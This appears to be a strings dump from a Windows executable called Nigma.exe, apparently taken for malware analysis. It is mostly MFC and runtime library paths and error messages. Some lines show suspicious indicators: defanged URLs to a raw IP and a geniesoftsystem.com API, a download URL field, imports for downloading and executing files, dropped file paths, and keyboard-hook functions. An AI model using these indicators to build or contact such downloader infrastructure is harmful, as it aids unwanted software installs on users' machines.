faulted while dumping object at $%p, %u bytes long
a %hs object at $%p, %u bytes long
a %hs object at $%p, %u bytes long
an invalid object at $%p, %u bytes long
an invalid object at $%p, %u bytes long
an object at $%p, %u bytes long
an object at $%p, %u bytes long
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpaneadapter.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpaneadapter.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbareditboxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbareditboxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonlabel.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonlabel.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbuttonsgroup.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbuttonsgroup.cpp
ENABLE_KEYS
ENABLE_KEYS
KEYS_MENU
KEYS_MENU
KEYS
KEYS
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl4.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl4.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistcheckbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistcheckbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncolorbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncolorbutton.cpp
RGB(%d, %d, %d)
RGB(%d, %d, %d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolormenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolormenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolordialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolordialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspane.cpp
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
%sMFCTasksPane-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonundobutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonundobutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockinghighlighterwnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockinghighlighterwnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingguide.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingguide.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsmartdockingguide.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsmartdockingguide.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olesvr1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olesvr1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewscrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewscrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewprev.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewprev.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledlgs2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledlgs2.cpp
m_bz.hTask =
m_bz.hTask =
m_bz.hResource =
m_bz.hResource =
m_bz.lpszTemplate =
m_bz.lpszTemplate =
m_bz.hInstance =
m_bz.hInstance =
m_bz.lCustData =
m_bz.lCustData =
m_bz.lpszCaption =
m_bz.lpszCaption =
m_bz.hWndOwner =
m_bz.hWndOwner =
m_bz.dwFlags =
m_bz.dwFlags =
m_bz.cbStruct =
m_bz.cbStruct =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprnt.cpp
m_pd.nCopies =
m_pd.nMaxPage =
m_pd.nMinPage =
m_pd.nToPage =
m_pd.nFromPage =
m_pd.Flags =
m_pd.hDC =
m_pd.hwndOwner =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appprnt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscommandslistbox.cpp
@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpickerctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomcolorspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstandardcolorspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpropertysheet.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dcprev.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c
f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setvbuf.c
Client hook allocation failure at file %hs line %d.
Memory allocated at %hs(%d).
Client hook re-allocation failure at file %hs line %d.
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.
CRT detected that the application wrote to a heap buffer that was freed.
crt block at 0x%p, subtype %x, %Iu bytes long.
client block at 0x%p, subtype %x, %Iu bytes long.
%hs(%d) :
#File Error#(%d) :
Data: %s
_CrtDbgReport: String too long or IO Error
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s%s
f:\dd\vctools\crt_bld\self_x86\crt\src\thread.c
f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c
%s(%d) : %s
_CrtDbgReport: String too long or Invalid characters in String
f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c
GetProcessWindowStation
f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_env.c
f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c
Run-Time Check Failure #%d - %s
f:\dd\vctools\crt_bld\self_x86\crt\src\input.c
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c
f:\dd\vctools\crt_bld\self_x86\crt\src\read.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_sftbuf.c
operator
f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c
portuguese-brazilian
RegCloseKey
RegOpenKeyExW
f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c
%s_%0x
%s(%d) :
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xutility
f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c
f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appmodul.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmain.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xlocale
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xiosbase
hXXp://159.203.127.87/nigma/index.php/api/check_version?data={"id":"1"}
hXXp://demo1.geniesoftsystem.com/country_ip/getip.php
C:\ProgramData\country_data.txt
BrowserControlDemo.cpp
/AppData/Roaming/nigma/version_nigma.txt
download_url
hXXp://
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\streambuf
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlexcept.h
AtlThrow: hr = 0x%x
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\cstringt.h
Warning: implicit LoadString(%u) failed
%Y-%m-%d %H:%M:%S
TimeZoneKeyName
C:\ProgramData\nigma.txt
hXXp://demo1.geniesoftsystem.com/master/index.php/api/getdate
C:/ProgramData/installationlimit_data.txt
hXXp://demo1.geniesoftsystem.com/master/index.php/api/get_installation_detail?data={"country":"
BrowserControlDemoDlg.cpp
/AppData/Roaming/nigma/uninstaller.exe
Advapi32.dll
RegOpenKeyTransactedA
hXXp://demo1.geniesoftsystem.com/nigma/html/content.html
D:\Allwyn\Miami\Master(05Apr16)\Release\Master.pdb
GetCPInfo
GetWindowsDirectoryA
GetProcessHeap
KERNEL32.dll
GetKeyState
SetWindowsHookExA
CreateDialogIndirectParamA
UnhookWindowsHookEx
GetKeyNameTextA
MapVirtualKeyA
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardState
MapVirtualKeyExA
USER32.dll
GetViewportOrgEx
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
MSIMG32.dll
COMDLG32.dll
WINSPOOL.DRV
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
OLEAUT32.dll
oledlg.dll
URLDownloadToFileA
urlmon.dll
GdiplusShutdown
gdiplus.dll
DeleteUrlCacheEntry
WININET.dll
OLEACC.dll
IMM32.dll
WINMM.dll
.PAVCOleException@@
.PAVCException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCArchiveException@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCToolBarCmdUI@@
.PAVCFileException@@
.PAVCOleDispatchException@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCAcceleratorKey@@
.?AVCMDIClientAreaWnd@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
.?AVCCmdTarget@@
%Documents and Settings%\%current user%\Application Data\master\master.exe
truePA
7$8(8,8084888
6 7$7(7,7
5'6[64748@8
4(575\5]6(777_7
3>
9$:(:,:0:4:
20>0-191
4%4U4h4w4
24383
:!;4;$
5o6
7?7(:7:9;
8#848>8^8
3/3(474$5
8%9U9r9
1$2C2R2_2
91:_:.;5;
3%3U3H4U4
?6?;?@?|?
? ?$?(?,?
82878
=%>,>(?0?
= =$=(=,=
263f3
11K1U1v1{1
5 5$5(5,505
7 7$7(7,707
6 6$686
; ;$;(;,;0;4;|;
8 8$8(8,8084888
? ?$?(?,?0?4?8?
? ?$?(?,?0?
6 6$6(6,6064686
: :$:(:,:0:
; ;$;(;,;0;
? ?$?(?,?0?4?8?@?
5(9,9094989
: :$:(:,:0:4:8:<:>
1 1$1(1,1014181
9,989\9|9
>,>8>\>|>
3 4@4`4|4
3$3@3`3|3
d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_value.cpp
c:\program files\microsoft visual studio 10.0\vc\include\xstring
c:\program files\microsoft visual studio 10.0\vc\include\xtree
std::_Tree_const_iterator,class std::allocator >,0> > >::operator *
std::_Tree_const_iterator,class std::allocator >,0> > >::operator
std::_Tree_const_iterator,class std::allocator >,0> > >::operator --
std::_Tree_const_iterator,class std::allocator >,0> > >::operator ==
invalid operator
d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_reader.cpp
std::_Deque_const_iterator >::operator *
c:\program files\microsoft visual studio 10.0\vc\include\deque
std::_Deque_const_iterator >::operator
std::_Deque_const_iterator >::operator *
@std::_Deque_const_iterator >::operator --
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpstr.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlalloc.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomcli.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atltransactionmanager.h
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlacc.h
accKeyboardShortcut
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcom.h
SHELL32.DLL
dwmapi.dll
UxTheme.dll
m_pColumnInfo[nColumn].ulColumnSize == sizeof(ctype)
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h
USER32.DLL
DIsIndexed()
mscoree.dll
^RICHED20.DLL
mode == _CRT_RPTHOOK_INSTALL || mode == _CRT_RPTHOOK_REMOVE
wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)
wcscpy_s(szExeName, 260, L"")
__crtMessageWindowW
f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fputc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fwrite.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgetpos.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fsetpos.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
_CrtSetDbgFlag
(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)
_CrtMemCheckpoint
f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c
("Invalid MBCS character sequence passed to strftime",0)
("Invalid MBCS character sequence passed into strftime",0)
f:\dd\vctools\crt_bld\self_x86\crt\src\mktime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsstr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\assert.c
f:\dd\vctools\crt_bld\self_x86\crt\src\sscanf.c
ekernel32.dll
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\wmemcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\strdup.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c
i_CrtSetReportHook2
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szExeName, 260, "")
__crtMessageWindowA
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsinc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsrchr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscspn.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsspn.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tsplitpath_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tmakepath_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsdec.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsupr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbslwr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c
fMode == _CRTDBG_REPORT_MODE || (fMode & ~(_CRTDBG_MODE_FILE | _CRTDBG_MODE_DEBUG | _CRTDBG_MODE_WNDW)) == 0
_CrtSetReportMode
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c
nRptType >= 0 && nRptType
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportA
strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")
wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportW
f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c
Wf:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\localref.c
((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))
f:\dd\vctools\crt_bld\self_x86\crt\src\write.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftelli64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\close.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
jwcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)
wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")
wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")
_NMSG_WRITE
f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\fwprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c
f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsncpy_s.inl
ADVAPI32.DLL
f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricoll.c
strcpy_s(resultstr, resultsize, autofos.man)
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strcoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c
_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2
f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c
MSPDB100.DLL
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c
("CRT Logic error during setenv",0)
__crtsetenv
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp
ppCategory && pfnCrtDbgReport
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomtime.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcore.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h
strcpy_s(errmsg, (94 38 2), _get_sys_err_msg(errnum))
f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c
f:\dd\vctools\crt_bld\self_x86\crt\src\open.c
0 && "Only UTF-16 little endian & UTF-8 is supported for reads"
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbicm.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xutility
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\deque
std::_String_const_iterator,class std::allocator >::operator *
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atltransactionmanager.h
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlbase.h
m_hKey != 0
hKeyParent != 0
Assertion failed: %s, file %s, line %d
{8856F961-340A-11D0-A96B-00C04FD705A2}
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
1.0.0.1
Nigma.exe